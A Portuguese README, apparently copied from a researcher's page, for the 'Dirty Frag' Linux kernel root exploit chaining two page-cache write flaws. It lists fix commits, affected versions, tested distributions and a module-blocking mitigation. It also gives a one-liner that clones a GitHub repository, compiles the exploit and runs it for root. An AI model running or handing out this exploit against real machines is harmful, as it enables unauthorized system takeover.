
Cadeia de exploração do kernel Linux (CVE-2026-43284 e CVE-2026-43500) que obtém root através de vulnerabilidades de escrita no page-cache do xfrm-ESP e RxRPC.
Linux CVE-2026-43284 & CVE-2026-43500
Copiado de @V4bel :) Obrigado :)
Este documento descreve a classe de vulnerabilidade Dirty Frag, descoberta e reportada pela primeira vez por Hyunwoo Kim (@v4bel), que pode obter privilégios de root nas principais distribuições Linux encadeando a vulnerabilidade xfrm-ESP Page-Cache Write (CVE-2026-43284) e a vulnerabilidade RxRPC Page-Cache Write (CVE-2026-43500).
Dirty Frag é um caso que estende a classe de bugs à qual pertencem Dirty Pipe e Copy Fail. Por ser um bug de lógica determinístico que não depende de uma janela de tempo, nenhuma race condition é necessária, o kernel não entra em pânico quando o exploit falha, e a taxa de sucesso é muito alta.
Para informações técnicas detalhadas e a linha do tempo, veja aqui.
xfrm-ESP Page-Cache Write (CVE-2026-43284) foi corrigida na mainline f4c50a4034e6.
RxRPC Page-Cache Write (CVE-2026-43500) foi corrigida na mainline aa54b1d27fe0.
Explorando : Execute apenas em engajamentos autorizados !!
Oneliner: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Passo a Passo :
primeiro compile o exploit, depois execute o binário
gcc -O0 -Wall -o exp exp.c -lutil
./exp
!! Limpeza
⚠️ Importante: Após executar este exploit, o page cache fica contaminado. Para limpar o page cache poluído e garantir a estabilidade do sistema, execute:
echo 3 > /proc/sys/vm/drop_caches
ou reinicie o sistema. Versões Afetadas
CVE-2026-43284: a vulnerabilidade xfrm-ESP Page-Cache Write está no escopo de cac2661c53f3 (2017-01-17) até f4c50a4034e6 (2026-05-05).
CVE-2026-43500: a vulnerabilidade RxRPC Page-Cache Write está no escopo de 2dc334f1a63a (2023-06-08) até aa54b1d27fe0 (2026-05-10).
Em outras palavras, o tempo de vida efetivo das vulnerabilidades é de cerca de 9 anos.
Este Dirty Frag foi testado nas seguintes versões de distribuição.
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...
Mitigação
Use o seguinte comando para remover os módulos nos quais as vulnerabilidades ocorrem e limpar o page cache.
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
Assim que cada distribuição fizer o backport de um patch, atualize conforme apropriado.